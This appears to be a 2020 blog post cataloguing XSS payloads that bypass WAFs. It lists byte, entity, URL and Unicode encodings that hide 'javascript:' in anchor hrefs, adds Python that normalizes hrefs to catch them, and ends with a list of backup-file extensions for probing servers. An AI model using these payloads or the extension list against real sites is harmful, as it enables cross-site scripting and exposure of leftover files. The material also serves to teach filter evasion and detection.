
XSS WAF Bypass

logthink 2020. 6. 18. 18:07
A tag WAF Bypass

Template of the anchor tag with the six injection positions [1]-[6] examined below; each numbered block lists the bytes (and, where relevant, their URL- and HTML-encoded forms) that a browser tolerates at that position without changing how the link is parsed.
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes: 
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]
Bytes: 
\x09 \x0a \x0c \x0d \x20

<a href\x20="javascript:alert(1)">
<a href=\x20"javascript:alert(1)">

[4]
Bytes: 
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20 

HTML Encoding:
&#x01; &#x02; &#x03; &#x04; &#x05; &#x06; &#x07; &#x08; &#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x0e; &#x0f; &#x10; &#x11; &#x12; &#x13; &#x14; &#x15; &#x16; &#x17; &#x18; &#x19; &#x1a; &#x1b; &#x1c; &#x1d; &#x1e; &#x1f; &#x20;

<a href="&Tab;javascript:alert(1)">
<a href="&#x001;javascript:alert(1)">

[5]
Bytes: 
\x09 \x0a \x0d

HTML Encoding:
&#x09; &#x0a; &#x0d;

<a href="javas\x09cript:alert(1)">
<a href="javas&Tab;cript:alert(1)">

[6]
Bytes:
\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0 

URL Encode (bytes):
%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0 

HTML Encode (bytes):
&#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x20; &#x21; &#x2b; &#x2d; &#x3b; &#x7e; &#xa0; 

UTF-8 Symbols:
\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff

URL Encode (UTF-8):
%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf

HTML Encode (UTF-8):
&#x1680; &#x2000; &#x2001; &#x2002; &#x2003; &#x2004; &#x2005; &#x2006; &#x2007; &#x2008; &#x2009; &#x200a; &#x2028; &#x2029; &#x202f; &#x205f; &#x3000; &#xfeff;

<a href="javascript:~alert(1)">
<a href="javascript://%0d%0aalert(1)">
<a href="javascript:\x0calert(1)">
<a href="javascript:%ef%bb%bfalert(1)">
<a href="javascript:&#xfeff;alert(1)">


-----------------------------------------
Notation: non-printable symbols are shown as character codes
\x00 - ASCII hex code (one byte)
\x20 - SPACE
\x0a - NEW LINE

\u0000 - Unicode code point (written as a UTF-8 byte sequence when URL-encoded)
\u1680 - OGHAM SPACE MARK
\u2028 - LINE SEPARATOR

URL-encoding a Unicode code point isn't obvious: the code point is encoded as UTF-8 first, and each resulting byte is percent-encoded:
\u1680 -> %e1%9a%80
\u2028 -> %e2%80%a8


Href attribute WAF Bypass

<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
javascript&#x3A;alert()

<!-- alert -->
#HTML entities/encode:
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``

#url encoding:
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29

#JS unicode 
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
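What the attribute-value variants above (positions [4]-[6] of the template, and the entity-encoded forms in this section) have in common is that the browser normalizes the value before it resolves the URL scheme: the HTML parser decodes character references (&Tab;, &colon;, &#x0003A;), and the URL parser strips leading and trailing C0 controls and spaces and removes tab, LF and CR anywhere in the input. A filter that matches `javascript:` on the raw string therefore lets most of them through. The following Python is an added example, not code from the original post, showing a link check that performs the same normalization before inspecting the scheme, run over the listed payloads as constructed sample input; the allowlist `ALLOWED_SCHEMES`, the function names and the `percent_encode_utf8` helper for the UTF-8 notation note are my own choices.

```python
import html
import re
from typing import List, Optional
from urllib.parse import quote

# Assumed link policy for this example: anything else with a scheme is rejected.
# Relative URLs carry no scheme and are accepted.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# WHATWG URL scheme: ASCII alpha, then alnum / '+' / '-' / '.', terminated by ':'
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")

# A raw-string blacklist of the kind the payloads are designed to slip past.
NAIVE_RE = re.compile(r"^\s*javascript:", re.IGNORECASE)

# Constructed sample values, taken from the payload positions discussed above
# (the attribute value only; the tag-structure positions [1]-[3] are not URL input).
SAMPLES = [
    "&Tab;javascript:alert(1)",
    "&#x001;javascript:alert(1)",
    "javas\tcript:alert(1)",
    "javas&Tab;cript:alert(1)",
    "ja&NewLine;vascript:alert(1)",
    "ja&#x0000A;vascript:alert(1)",
    "java&#x73;cript:alert()",
    "javascript&colon;alert()",
    "javascript&#x0003A;alert()",
    "javascript&#58;alert(1)",
    "javascript://%0d%0aalert(1)",
    "javascript:\x0calert(1)",
    "JaVaScRiPt:alert(1)",
]


def normalize_href(raw: str) -> str:
    """Apply the normalization a browser applies to an href before parsing it."""
    # 1. The HTML parser decodes character references in the attribute value.
    #    Note: html.unescape drops control references such as &#x01; outright,
    #    whereas a browser emits the control byte; step 2 strips a leading control
    #    either way, so the resulting scheme is the same.
    value = html.unescape(raw)
    # 2. The URL parser strips leading and trailing C0 controls and spaces (0x00-0x20).
    value = value.strip("".join(chr(c) for c in range(0x21)))
    # 3. ASCII tab, LF and CR are removed anywhere in the input.
    value = re.sub(r"[\t\n\r]", "", value)
    return value


def scheme_of(raw: str) -> Optional[str]:
    """Scheme of the href as the browser would see it, lowercased; None if relative."""
    m = SCHEME_RE.match(normalize_href(raw))
    return m.group(1).lower() if m else None


def is_safe_href(raw: str) -> bool:
    """Allowlist check on the normalized scheme (no scheme means a relative URL)."""
    scheme = scheme_of(raw)
    return scheme is None or scheme in ALLOWED_SCHEMES


def naive_is_safe(raw: str) -> bool:
    """Blacklist on the raw string; shown only to contrast with is_safe_href."""
    return NAIVE_RE.match(raw) is None


def missed_by_naive(values: List[str] = SAMPLES) -> List[str]:
    """Values the raw-string blacklist accepts but the normalized check rejects."""
    return [v for v in values if naive_is_safe(v) and not is_safe_href(v)]


def percent_encode_utf8(ch: str) -> str:
    """URL-encode a code point: UTF-8 encode it, then percent-encode every byte."""
    return quote(ch.encode("utf-8"), safe="").lower()


if __name__ == "__main__":
    for v in SAMPLES:
        print(f"{v!r:40} scheme={scheme_of(v)!r:14} naive_safe={naive_is_safe(v)} safe={is_safe_href(v)}")
    print(f"{len(missed_by_naive())} of {len(SAMPLES)} samples pass the raw-string blacklist")
    for cp in ("\u1680", "\u2028", "\ufeff"):
        print(f"\\u{ord(cp):04x} -> {percent_encode_utf8(cp)}")
```

The design point is that the check runs on the value the browser will actually act on, not on the bytes the WAF sees on the wire; anything that inspects the raw attribute is one encoding layer short. The allowlist also rejects schemes the page does not discuss (for instance `data:`), which is the intended behaviour of an allowlist rather than a blacklist.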

extensions_temp_backup.txt

.0
.1
.2
.3
.tar
.tgz
.zip
.tar.gz
.rar
.cache
.out
.diff
.old
.temp
.templ
.tmp
.bak
.back
.bak2
.backup
.swo
.%filename%.swo
.swp
.%filename%.swp
.sav
.sv
.save
.un~
.%filename%.un~
~
.~
.~1~
.~2~
.%filename%.~

